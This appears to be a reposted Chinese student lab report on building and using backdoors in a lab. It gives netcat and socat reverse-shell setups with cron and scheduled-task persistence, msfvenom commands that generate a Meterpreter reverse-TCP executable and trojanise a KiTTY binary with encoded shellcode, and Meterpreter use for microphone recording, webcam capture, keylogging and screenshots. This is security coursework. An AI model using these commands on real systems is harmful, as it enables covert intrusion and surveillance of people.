其他分享
首页 > 其他分享> > Exp2-后门原理与实践

Exp2-后门原理与实践

作者:互联网

基础问题回答

1、例举你能想到的一个后门进入到你系统中的可能方式?

2、例举你知道的后门如何启动起来(win及linux)的方式?

3、Meterpreter有哪些给你印象深刻的功能?

4、如何发现自己有系统有没有被安装后门?

实验内容

一、使用netcat获取主机操作Shell,cron启动

  1. 分别查看主机和kali的IP:

image-20210328123846160

image-20210328123915537

  1. Win10主机使用ncat程序监听本机的5205端口

image-20210328125046125

  1. kali虚拟机nc连接Win10主机反弹shell,成功getshell

image-20210328125344769

  1. 通过cron命令启动

image-20210328130131790

image-20210328130100328

二、使用socat获取主机操作Shell, 任务计划启动

  1. 在“任务计划程序”中“创建任务”

image-20210328131853823

image-20210328132230535

image-20210328132210271

image-20210328132147440

image-20210328132709282

  1. 通过kali连接Win10主机

image-20210328132953269

三、使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

  1. 使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.211.137 LPORT=1221 -f exe > 20181221.exe指令生成后门。

    image-20210328135514750

image-20210328133701957

  1. 在Win10中使用ncat -lv 1221 > 20181221.exe指令将被控制主机进入接受文件模式

image-20210328135133457

  1. 在kali中使用nc 192.168.211.1 1221 < 20181221.exe将后门传输过去

image-20210328135503020

image-20210328135443222

  1. 在kali上使用msfconsole指令进入msf控制台

image-20210328140117735

  1. 输入指令进行连接

image-20210328140154503

  1. Win10主机运行后门“20181221.exe”

image-20210328140230266

  1. kali上getshell

image-20210328140254136

四、使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

  1. 使用record_mic指令可以截获一段音频

image-20210328140520782

  1. 使用webcam_snap指令可以使用摄像头进行拍照,效果如下

    image-20210328140734953

image-20210328140707664

  1. 使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录

image-20210328140901017

  1. 使用screenshot指令可以进行截屏

image-20210328141101069

五、可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

通过查找网上资料发现有这样一条指令:

msfvenom -p windows/meterpreter/reverse_tcp -x ./KiTTYPortable.exe -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=192.168.20.136 LPORT=443 -f exe > KiTTy_backdoor.exe

生成完payload之后,我们运行MSF(具体指令参考上一过程),再运行我们生成的20181221pwn文件,就可以getshell了

image-20210328145907224

实验中遇到的问题及解决方法

  1. 传输20181221后门文件到win10失败。

解决:关闭杀毒软件,将后门文件设为信任文件。

  1. 生成的20181221pwn文件无法运行,提示权限不够

解决:通过chmod +x 20181221pwn命令修改文件权限,从而可运行

思考体会

​ 通过本次实验我懂得了后门的原理,学会了如何制作后门和使用后门,并且学会了MSF的使用。这次实验使我深刻感受到杀毒软件的必要性和网络安全的重要性,要时刻防范后门的植入。

标签:后门,exe,1221,Exp2,实践,192.168,指令,主机
来源: https://www.cnblogs.com/MisakaYuii-Z/p/14588771.html